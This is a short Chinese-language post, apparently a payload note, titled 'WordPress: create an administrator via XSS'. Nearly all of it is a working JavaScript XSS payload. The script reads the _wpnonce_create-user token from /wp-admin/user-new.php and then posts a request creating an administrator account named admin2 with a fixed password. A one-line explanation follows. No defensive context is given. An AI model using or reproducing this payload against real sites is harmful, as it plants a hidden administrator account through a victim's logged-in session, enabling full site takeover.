WordPress通过XSS创建管理员
WordPress通过XSS创建管理员
XSS代码:
var xhr = new XMLHttpRequest()
xhr.open("GET","/wp-admin/user-new.php")
xhr.onreadystatechange = function () {
   if (xhr.readyState === 4) {
      token = xhr.responseText.match('name="_wpnonce_create-user" value="(.*?)"')[1]

      	var url = "/wp-admin/user-new.php";
		var xhr2 = new XMLHttpRequest();
		xhr2.open("POST", url);

		xhr2.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

		xhr2.onreadystatechange = function () {
		   if (xhr2.readyState === 4) {
		      console.log(xhr2.status);
		      console.log(xhr2.responseText);
		   }};

		var data = "action=createuser&_wpnonce_create-user="+token+"&_wp_http_referer=%2Fwp-admin%2Fuser-new.php&user_login=admin2&email=admin%40gg.com&first_name=&last_name=&url=&locale=site-default&pass1=Aa123456&pass2=Aa123456&pw_weak=on&role=administrator&createuser=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7";

		xhr2.send(data);
   }};
xhr.send(null)
 
先获取到token,然后请求创建管理员的接口,添加一个账号密码为(admin2/Aa123456)的管理员账户。